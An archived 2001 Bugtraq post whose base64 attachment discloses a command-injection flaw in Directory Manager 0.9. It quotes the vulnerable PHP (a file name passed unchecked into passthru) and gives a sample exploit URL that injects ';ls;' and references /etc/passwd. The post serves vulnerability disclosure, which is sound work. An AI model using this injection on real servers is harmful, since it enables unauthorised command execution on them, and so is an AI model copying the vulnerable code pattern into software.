[22534] in bugtraq
directorymanager bug
daemon@ATHENA.MIT.EDU (Karol Wiesek)
Wed Sep 5 15:40:52 2001
Date: Wed, 5 Sep 2001 19:20:17 +0200 (CEST)
From: Karol Wiesek <appelast@cdp.pl>
To: <bugtraq@securityfocus.com>
Message-ID: <Pine.LNX.4.33.0109051918180.15253-200000@osiris.waw.cdp.pl>
MIME-Version: 1.0
Content-Type: MULTIPART/MIXED; BOUNDARY="-2132552314-788443760-999710417=:15253"
---2132552314-788443760-999710417=:15253
Content-Type: TEXT/PLAIN; charset=US-ASCII
small bug which allows to execute commands remotely
--
+---------------------------------+
| Karol Wiesek - appelast |
| Administrator osiris.waw.cdp.pl |
| mailto : appelast@cdp.pl |
| http://osiris.waw.cdp.pl/squad |
+---------------------------------+
---2132552314-788443760-999710417=:15253
Content-Type: TEXT/PLAIN; charset=US-ASCII; name=directorymanager_bug_execute
Content-Transfer-Encoding: BASE64
Content-ID: <Pine.LNX.4.33.0109051920170.15253@osiris.waw.cdp.pl>
Content-Description:
Content-Disposition: attachment; filename=directorymanager_bug_execute
RGlyZWN0b3J5IE1hbmFnZXIgRXhlY3V0ZSBDb21tYW5kICFCVUchDQoNClZl
cnNpb24gQWZmZWN0ZWQgOg0KRGlyZWN0b3J5IE1hbmFnZXIgMC45DQoNCkRp
cmVjdG9yeSBNYW5hZ2VyIGlzIGEgZGlyZWN0b3J5IG1hbmFnZXIgOykNCmkg
cmVhbHkgZG9uJ3Qga25vdyB3aGF0IGhlIGRvZXMuIA0KaXQgaGFzIGEgc2Vy
aW91cyBzZWN1cml0eSBmbGF3LCB3aGljaCBhbGxvd3MgDQphbnkgcGVyc29u
IHRvIGV4ZWN1dGUgY29tbWFuZHMgb24gYXR0YWNrZWQgc3lzdGVtDQphcyB3
ZWJzZXJ2ZXItdXNlci4NCg0KRnJvbSBlZGl0X2ltYWdlLnBocCA6DQoNCmlm
KCAhJGRuICkgSGVhZGVyKCAiTG9jYXRpb246ICRkZWZhdWx0cGFnZSIgKTsN
Ci4uLg0KaWYoIGlzX2ZpbGUoICR1c2VyZmlsZSApICYmICR1c2VyZmlsZV9u
YW1lICkNCiAgICB7DQogICAgaWYoIGNvcHkoICR1c2VyZmlsZSwgIi90bXAv
IiAuICR1c2VyZmlsZV9uYW1lICkgKQ0KICAgICAgICB7DQoJLi4uDQogICAg
ICAgIHBhc3N0aHJ1KCAiL3Vzci9iaW4vY29udmVydCAtc2NhbGUgNjAweDYw
MCAvdG1wLyR1c2VyZmlsZV9uYW1lIC90bXAvJHVzZXJmaWxlX25hbWUuanBn
IiApOw0KCS4uLg0KCXVubGluayggIi90bXAvJHVzZXJmaWxlX25hbWUuanBn
IiApOw0KDQoNClNvIHdlIGNhbiBwdXQgYW4gImV2aWwgY29kZSIgaW50byAk
dXNlcmZpbGVfbmFtZSB2YXJpYWJsZSANCmZvciBleGFtcGxlICR1c2VyZmls
ZV9uYW1lPTtsczsNCmFmdGVyIGl0IHRoZSBzZWNvbmQgcGF0aCB0cmFuc2Zl
ciB0byAvdXNyL2Jpbi9jb252ZXJ0IHdpbGwgbG9vayANCmxpa2UgdGhpcyA6
DQovdG1wLztsczsuanBnDQoNClRoaXMgaXMgYSBjb3JyZWN0IHBhdGggaW4g
dW5peCBhbmQgZnVuY3Rpb24gY29weSB3b24ndCBmYWlsLCBhbmQNCmZ1bmN0
aW9uIHBhc3N0aHJ1IHdpbGwgZXhlY3V0ZSBscyA7KQ0KDQpFeGFtcGxlIEV4
cGxvaXQgOg0KdmljdGltLmhvc3QvZWRpdF9pbWFnZS5waHA/ZG49MSZ1c2Vy
ZmlsZT0vZXRjL3Bhc3N3ZCZ1c2VyZmlsZV9uYW1lPSUyMDtsczslMjANCg0K
DQoNCkthcm9sIFdpZXNlayAtIGFwcGVsYXN0IDxhcHBlbGFzdEBjZHAucGw+
DQoNCmdyMzN0eiA6IA0KY2xpcGggLSBoaXMgYnJhaW4gaXMgcmVhbCBmYXN0
LCBub3QgYWxsIHRoZSB0aW1lLg0KI0JTcXVhZCAtIHBhdGF0YWoNCnBydXR5
IC0gI0JTcXVhZCBjeWNsZXIgd2l0aCBicm9rZW4gaGFuZCA7KSB5ZWFoIGhl
IHJlYWx5IHdhbnQgdG8gcmlkZSBhIGJpa2UgDQoJYnV0IGhlIGNhbid0IDs+
DQotLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
DQoJICAgIF9fX19fX19fX19AX19fICAgICAgICAjQlNxdWFkDQoJICAgLyAg
ICAgICAgICAgICAgXCAgICAgDQoJXyAvICAgQlVHIFBPTElDRSAgIFxfX19f
X19fX19fDQoJfF9fX18gICBfX19fX19fX19fX19fX19fICAgX19fX1wNCgkg
ICAgIEBAQCAgICAgICAgICAgICAgICBAQEAgIA0KLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0K
---2132552314-788443760-999710417=:15253--
